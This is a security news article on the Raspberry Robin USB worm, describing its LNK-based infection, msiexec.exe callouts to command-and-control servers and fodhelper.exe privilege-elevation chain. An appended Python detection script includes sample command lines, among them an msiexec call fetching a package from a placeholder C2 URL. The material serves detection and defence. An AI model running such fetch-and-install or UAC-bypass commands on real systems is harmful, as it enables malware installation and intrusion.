Activity called ‘Raspberry Robin’ uses Microsoft Standard Installer and other legitimate processes to communicate with threat actors and execute malicious commands.
Wormable malware dubbed Raspberry Robin has been active since Sept. 2021 and is making its way through USB drives onto Windows machines, where it uses Microsoft Standard Installer and other legitimate processes to install malicious files, researchers have found.
Researchers at Red Canary Intelligence first began tracking the malicious activity in the autumn, when it began as a handful of detections with similar characteristics, first observed in multiple customers’ environments by Jason Killam from Red Canary’s Detection Engineering team.
Once the worm spreads via a USB drive to someone’s machine, the activity relies on msiexec.exe to call out to its infrastructure, which is often made up of QNAP devices, using HTTP requests that contain a victim’s user and device names, Red Canary’s Lauren Podber and Stef Rand wrote in a blog post published Thursday.
Tor Exit Nodes
Researchers also observed Raspberry Robin using Tor exit nodes as additional command-and-control (C&C) infrastructure, they wrote. Eventually the worm installs malicious dynamic link library (DLL) files found on the infected USB drive.
While researchers first noticed Raspberry Robin as early as Sept. 2021, most of the activity observed by Red Canary occurred during Jan. of this year, they explained.
Although researchers observed various processes and executions by the malicious activity, they acknowledged that these observations have left some unanswered questions.
The team has not yet figured out how or where Raspberry Robin infects external drives to perpetuate its activity, though it is likely this infection occurs offline or “otherwise outside of our visibility,” researchers surmised.
They also do not know why Raspberry Robin installs a malicious DLL, although they believe it may be an attempt to establish persistence on an infected system, though there is not enough evidence to make this conclusive, researchers acknowledged.
However, the biggest question mark surrounding the worm is the objective of the threat actors behind it, researchers said.
“Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” they acknowledged.
Initial Access and Execution
Infected removable drives, typically USB devices, introduce the Raspberry Robin worm as a shortcut (LNK) file masquerading as a legitimate folder on the drive, researchers stated. LNK files are Windows shortcuts that point to, and are used to open, another file, folder or application.
Soon after the infected drive is connected to the system, the worm updates the UserAssist registry entry, recording the execution of a ROT13-encoded value that references a LNK file once decoded. For example, researchers observed the value q:\erpbirel.yax, which decodes to d:\recovery.lnk, they wrote.
Infected External Drive
Execution commences when Raspberry Robin uses cmd.exe to read and execute a file stored on the infected external drive, researchers observed.
“The command is consistent across Raspberry Robin detections we have seen so far, making it reliable early evidence of potential worm activity,” they noted.
In the next stage of execution, cmd.exe typically launches explorer.exe and msiexec.exe. The former’s command line can be a mixed-case reference to the external device, such as a person’s name like LAUREN V, or to the name of the LNK file, researchers said.
The worm “also extensively uses mixed-case letters in its commands,” most likely to avoid detection, researchers added.
Raspberry Robin uses the second executable launched, msiexec.exe, to attempt external network communication to a malicious domain for command-and-control purposes, researchers revealed.
In several examples of the activity that researchers have observed, the worm has used msiexec.exe to install a malicious DLL file, although, as noted, they are still not certain of the DLL’s purpose.
The worm also uses msiexec.exe to launch a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command, they explained.
“Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt,” researchers noted. As this is unusual behaviour for the utility, this activity can be used to detect the presence of Raspberry Robin on an infected machine, they stated.
The rundll32.exe command then starts another legitimate Windows utility, odbcconf.exe, and passes in additional commands to execute and configure the recently installed malicious DLL file, researchers concluded.
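The execution chain described above, turned into detection logic as an added example (not Red Canary’s code): it decodes a ROT13 UserAssist value of the kind quoted earlier and flags the unusual parent/child process pairs over constructed sample events. The telemetry field names, the mixed-case threshold, the “any drive but C:” heuristic and the sample command lines are all assumptions.

```python
import codecs
import re
from collections import namedtuple
# Minimal process-creation record; the field names are an assumption.
Event = namedtuple("Event", "parent image cmdline")

def decode_userassist(value):
    """UserAssist stores executed paths ROT13-encoded; return the plain path."""
    return codecs.decode(value, "rot13")

def _case_transitions(token):
    """Count upper/lower flips inside one token, e.g. 'TyPe' -> 3."""
    letters = [c for c in token if c.isalpha()]
    return sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))

def heavily_mixed_case(cmdline, threshold=3):
    """Normal path tokens (Windows, System32) flip case once; worm commands flip often."""
    return any(_case_transitions(t) >= threshold for t in cmdline.split())

def references_removable_drive(cmdline):
    """Treat any drive letter other than C: as potentially removable (assumption)."""
    return re.search(r"\b[D-Zd-z]:\\", cmdline) is not None

def detect(events):
    """Return (rule, image) hits for the parent/child chain the report describes."""
    hits = []
    for e in events:
        p, i, c = e.parent.lower(), e.image.lower(), e.cmdline
        if i == "cmd.exe" and references_removable_drive(c) and heavily_mixed_case(c):
            hits.append(("cmd.exe running mixed-case command from removable drive", i))
        if p == "cmd.exe" and i == "msiexec.exe" and re.search(r"https?://", c, re.I):
            hits.append(("msiexec.exe fetching a package from an external URL", i))
        if p == "msiexec.exe" and i == "fodhelper.exe":
            hits.append(("fodhelper.exe launched by msiexec.exe (unusual parent)", i))
        if p == "fodhelper.exe" and i == "rundll32.exe":
            hits.append(("fodhelper.exe spawning rundll32.exe (elevation, no UAC prompt)", i))
        if p == "rundll32.exe" and i == "odbcconf.exe":
            hits.append(("rundll32.exe spawning odbcconf.exe to configure a DLL", i))
    return hits

# Constructed sample telemetry, not captured from a real infection.
SAMPLE_EVENTS = [
    Event("explorer.exe", "cmd.exe", r"CmD /R StArT D:\ReCoVeRy.lNk"),
    Event("cmd.exe", "msiexec.exe", "mSiExEc /q /i http://c2.example.invalid/pkg.msi"),
    Event("msiexec.exe", "fodhelper.exe", "fodhelper.exe"),
    Event("fodhelper.exe", "rundll32.exe", "rundll32.exe <args>"),
    Event("rundll32.exe", "odbcconf.exe", "odbcconf.exe <args>"),
    Event("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\lauren\notes.txt"),
]
```

Running `detect(SAMPLE_EVENTS)` yields one hit per stage of the chain and none for the benign notepad.exe event; in production, feed it process-creation telemetry (e.g. Sysmon event ID 1) in the same parent/image/cmdline shape.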